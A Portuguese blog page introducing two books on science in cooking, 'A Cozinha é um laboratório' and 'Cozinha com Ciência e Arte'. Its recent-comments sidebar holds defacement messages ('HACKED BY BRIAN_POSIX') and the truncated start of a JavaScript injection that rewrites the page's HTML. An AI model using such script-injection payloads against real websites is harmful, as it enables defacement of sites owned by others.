Portugal também está na vanguarda da gastronomia! Existem chefs e cientistas que colaboram no sentido de inovar na gastronomia contemporânea, sem no entanto esquecer as nossas raízes, os nossos sabores.

 

Nesta rubrica vimos apresentar o trabalho made in Portugal, nesta área tão criativa como científica. O livro de Margarida Guerreiro e Paulina Mata, “A Cozinha é um laboratório”, faz-nos despertar o interessa da ciência na cozinha. Uma leitura importante para quem se interessa em perceber melhor o que se passa no seu quotidiano… dentro da sua cozinha!  

 

O novo livro da Cooking.Lab, “Cozinha com Ciência e Arte”. Neste livro, encontrará receitas simples para explorar novas texturas, sabores e aromas,  reinventar receitas tradicionais e criar experiências multi-sensoriais. Seguindo um conjunto de instruções simples, poderá dar um toque de originalidade às suas refeições, tornando-as inesquecíveis. Passo a passo, e através de novas técnicas, descubra uma cozinha de vanguarda, muito personalizada, adoptada por chefs de todo o mundo.

 

Estes novos conhecimentos proporcionam uma maior liberdade criativa e culminam em resultados surpreendentes, alterando a forma como percepcionamos e degustamos uma refeição.

 



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO